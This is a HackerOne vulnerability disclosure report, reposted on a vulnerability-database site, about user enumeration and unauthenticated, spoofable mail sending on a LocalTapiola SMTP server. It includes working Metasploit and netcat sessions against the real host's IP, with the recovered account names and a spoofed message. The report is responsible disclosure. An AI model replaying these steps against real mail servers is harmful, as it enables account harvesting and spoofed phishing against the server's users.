Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
hackeroneRnmxH1:183548
HistoryNov 20, 2016 - 2:12 a.m.

LocalTapiola: SMTP configuration vulnerability viestinta.lahitapiola.fi

2016-11-2002:12:45
rnmx
hackerone.com
20
JSON

Hello guys,

I have two related SMTP vulnerabilities. I decided to put both of them under the same ticket because they are closely related.

Summary:
I discovered two SMTP vulnerabilities on host viestinta.lahitapiola.fi. First it is possible to perform user enumeration. For this you can use metasploit in following way:

msf > use auxiliary/scanner/smtp/smtp_enum msf auxiliary(smtp_enum) > set RHOSTS 83.150.127.170 RHOSTS => 83.150.127.170 msf auxiliary(smtp_enum) > run [*] 83.150.127.170:25 Banner: 220 viestinta.tapiola.fi ESMTP Postfix [+] 83.150.127.170:25 Users found: , adm, bin, daemon, fax, ftp, games, gdm, gopher, halt, lp, mail, news, nobody, operator, postgres, postmaster, sshd, sync, uucp, webmaster, www [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed

With this step we recovered valid users on the system (please note I used the default dictionary which comes with metasploit, I did not attempt to create wordlist which would discover your personal email addresses, to limit number of brute force guesses).

Second vulnerability is the fact an attacker without any authentication can send emails from this SMTP. Email are limited to β€œ@viestinta.lahitapiola.fi” only. To reproduce you can use NetCat utility:

root@kali:~/Android/Sdk/tools# nc -nvv 83.150.127.170 25 (UNKNOWN) [83.150.127.170] 25 (smtp) open 220 viestinta.tapiola.fi ESMTP Postfix HELO 83.150.127.170 250 viestinta.tapiola.fi MAIL FROM:<[email protected]> 250 2.1.0 Ok RCPT TO:<[email protected]> 550 5.1.1 <[email protected]>: Recipient address rejected: User unknown in local recipient table RCPT TO:<[email protected]> 550 5.1.1 <[email protected]>: Recipient address rejected: User unknown in local recipient table RCPT TO:<[email protected]> 250 2.1.5 Ok DATA 354 End data with <CR><LF>.<CR><LF> test . 250 2.0.0 Ok: queued as 98F9E3F201A1 421 4.4.2 viestinta.tapiola.fi Error: timeout exceeded sent 211, rcvd 481

In NetCat session above you can see I used fake email address [email protected] to send email to [email protected] (we discovered this is valid target in step one - user enumeration). You can see the difference when I tried to send an email to address which does not exist β€œ<[email protected]>: Recipient address rejected: User unknown in local recipient table”.

From my point of view there are a few problems:

  1. Information leakage (in step one attacker can get valid system accounts/emails). Those details can be used during later phase of attack (probably low impact)
  2. An attacker could use this to spam internal users, maybe DoS (low risk)
  3. An attacker could use this to launch very efficient phishing campaign. As I already stated it is possible to send email from any address, so attacker could pick something trusted like administrator@ or it-support@ , etc. Then there is a higher chance unsuspecting employee would click malicious URL/executable in the email (probably medium risk)

Domain: viestinta.tapiola.fi

Browsers / Apps Verified In: n/a - infrastruture problem

Steps To Reproduce: Provided in summary section.

Related reports, best practices

https://pentestlab.wordpress.com/2012/11/20/smtp-user-enumeration/ - about SMTP user enumeration

JSON